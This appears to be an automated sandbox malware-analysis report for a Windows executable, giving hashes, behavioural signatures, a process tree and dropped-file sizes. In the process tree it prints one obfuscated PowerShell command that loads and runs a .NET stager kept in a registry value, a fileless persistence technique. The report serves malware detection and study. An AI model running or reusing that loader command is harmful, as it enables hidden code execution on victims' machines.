Analysis
-
max time kernel
150s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
16-05-2024 01:47
General
-
Target
cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe
-
Size
4.5MB
-
MD5
133fda00a490e613f3a6c511c1c660eb
-
SHA1
e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9
-
SHA256
cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169
-
SHA512
f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd
-
SSDEEP
24576:ypPiRcjGOOiX3Sl9L7MupXdagdle6whTeo5A4T9W+xjaCsyfwUmvHX+ODvz8JQDm:
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 42 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{618df204-c18d-42ee-b037-9d2d4814101d}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {2DE9B01A-34BB-44A1-832B-B88E330A60EF} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+'F'+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+'s'+'t'+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe"C:\Users\Admin\AppData\Local\Temp\cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe"2⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\$773dd258"C:\Users\Admin\AppData\Local\Temp\$773dd258"3⤵
- Executes dropped EXE
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.5MB
MD5133fda00a490e613f3a6c511c1c660eb
SHA1e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9
SHA256cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169
SHA512f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd
-
Filesize
2.2MB
-
Filesize
6.9MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
336KB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
304KB
-
Filesize
504KB
-
Filesize
2.2MB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4.5MB
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
168KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
9.6MB